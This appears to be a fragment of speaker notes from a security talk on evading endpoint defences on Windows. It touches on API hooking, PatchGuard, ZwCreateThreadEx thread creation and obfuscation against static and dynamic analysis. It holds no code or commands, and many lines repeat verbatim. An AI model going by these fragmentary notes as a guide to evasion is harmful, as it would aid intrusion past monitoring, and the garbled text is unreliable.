  27. In short it is a technique that allows you to alter or augment the behaviour of the operating system. Hook a function do bad things……. In old school gaming this is equivalent to hacking a game so that you cannot die.
  28. Turns out the last option is super common Kernel Patch Protection or Patch Guard scans the kernel on almost every level and will triggers a BSOD if a modification is detected. This includes the area’s where the WINAPI’s logic is carried out.
  29. ZW Create Thread EX
  30. In Process Client
  31. Hoang Bui XPN Many other examples – show these options to be rather easy.
  32. NO! Its just getting more difficult to deploy, and is only as good as the monitoring in place. There is lots of obfuscation that is still possible to evade static analysis and even dynamic analysis toolkits
  33. My house my rules What am I going to do about it? F*cking Judo Chop it the hell outta there!
  34. @fsx30 XPN Many other examples – show these options to be rather easy.
  35. Navgiating to this folder means that Code will executed within explorer
  36. @fsx30 XPN Many other examples – show these options to be rather easy.
  37. @fsx30 XPN Many other examples – show these options to be rather easy.
  38. My house my rules What am I going to do about it? F*cking Judo Chop it the hell outta there!
  39. My house my rules What am I going to do about it? F*cking Judo Chop it the hell outta there!
  40. My house my rules What am I going to do about it? F*cking Judo Chop it the hell outta there!
  41. @fsx30 XPN Many other examples – show these options to be rather easy.
  42. @fsx30 XPN Many other examples – show these options to be rather easy.
  43. @fsx30 XPN Many other examples – show these options to be rather easy.
  44. @fsx30 XPN Many other examples – show these options to be rather easy.
  45. @fsx30 XPN Many other examples – show these options to be rather easy.
  46. My house my rules What am I going to do about it? F*cking Judo Chop it the hell outta there!
  47. Turns out the last option is super common
  48. We already have this level of capability and its interesting what gets detected and what does not Harder to pwn 2003/xp/nt Palentir, AI, machine learning, dark trace…… Microsoft ATA, ATP, Defender
  49. BEN: